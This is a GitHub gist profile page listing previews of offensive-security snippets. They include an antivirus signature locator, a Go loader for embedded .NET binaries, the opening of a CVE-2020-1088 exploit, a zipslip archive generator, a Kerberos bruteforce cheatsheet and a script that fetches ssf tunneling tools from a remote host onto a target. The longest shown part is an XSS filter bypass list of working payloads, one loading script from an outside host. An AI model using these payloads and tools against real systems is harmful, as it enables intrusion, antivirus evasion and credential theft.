Skip to content

Instantly share code, notes, and snippets.

View xct's full-sized avatar
🏴‍☠️

xct xct

🏴‍☠️
853 followers · 198 following
View GitHub Profile
@xct
xct / Find-AVSignature.ps1
Created December 16, 2020 07:04
Find-AVSignature
function Find-AVSignature {
<#
.SYNOPSIS
Find-AVSignature
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD 3-Clause
@xct
xct / go-sharp-loader.go
Created August 6, 2020 10:07 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
@xct
xct / WerArbitraryFileDelete.cs
Created May 17, 2020 18:58 — forked from fisboger/WerArbitraryFileDelete.cs
CVE-2020-1088
using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
@xct
xct / impersonate.go
Created April 22, 2020 17:03 — forked from kostix/impersonate.go
A demonstration example for http://stackoverflow.com/a/26124494
// A demonstration example for http://stackoverflow.com/a/26124494
// It runs a goroutine locked to an OS thread on Windows
// then impersonates that thread as another user using its name
// and plaintext password, then reverts to the default security
// context before detaching from its OS thread.
package main
import (
"log"
"runtime"
@xct
xct / xxsfilterbypass.lst
Created August 20, 2019 16:34 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@xct
xct / zipslip.py
Last active August 5, 2021 10:16
Creates zips with relative paths ("zipslip")
#!/usr/bin/env python
import zipfile
import sys
import os
'''
Usage:
python zipslip.py xct.zip root.txt ../../../../..
Added ../../../../../root.txt to xct.zip
'''
@xct
xct / kerberos_attacks_cheatsheet.md
Created June 23, 2019 11:57 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@xct
xct / ssf.md
Last active June 19, 2019 08:37
Deploy ssf to a windows or linux target & run

Windows

param([string]$addr, [string]$port)
wget "http://${addr}:${port}/ssf.exe" -o "ssf.exe"
wget "http://${addr}:${port}/ssfd.exe" -o "ssfd.exe"
mkdir certs
cd certs
wget "http://${addr}:${port}/certs/certificate.crt" -o "certificate.crt"
wget "http://${addr}:${port}/certs/dh4096.pem" -o "dh4096.pem"